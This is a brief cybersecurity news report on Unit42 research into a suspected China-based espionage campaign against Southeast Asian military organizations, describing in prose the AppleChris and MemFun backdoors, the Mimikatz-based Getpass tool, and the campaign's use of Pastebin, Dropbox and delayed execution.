A suspected China-based cyber espionage campaign has targeted military organizations across Southeast Asia in a long-running operation that dates back to at least 2020, according to PAN’s Unit42.
Researchers said the campaign, tracked as CL-STA-1087, focuses on carefully targeted intelligence gathering rather than large-scale data theft. The attackers reportedly searched for sensitive documents related to military capabilities, organizational structures, and cooperation with Western armed forces.
The operation leverages backdoors called AppleChris and MemFun, as well as a credential-harvesting utility known as Getpass.
Researchers first detected the activity after identifying suspicious PowerShell commands that delayed execution for several hours before creating reverse connections to attacker-controlled command-and-control servers. The initial entry point into the targeted networks remains unknown.
Once inside, the attackers deployed multiple versions of AppleChris across compromised systems to maintain access and move laterally within networks. Researchers said the group appeared particularly interested in documents related to command, control, communications, computers, and intelligence systems commonly referred to as C4I.
The malware also used publicly accessible platforms such as Pastebin and Dropbox to retrieve hidden server addresses used for communication with attackers. Some of the Pastebin entries date back to September 2020.
Another tool called MemFun, functions as a modular malware platform capable of downloading additional malicious components during an attack. Meanwhile, Getpass, which is based on a modified version of the well-known hacking tool Mimikatz, was used to extract passwords and authentication data directly from compromised systems.
Researchers said several malware variants were designed to evade automated security systems by delaying their execution, allowing them to bypass common sandbox detection methods.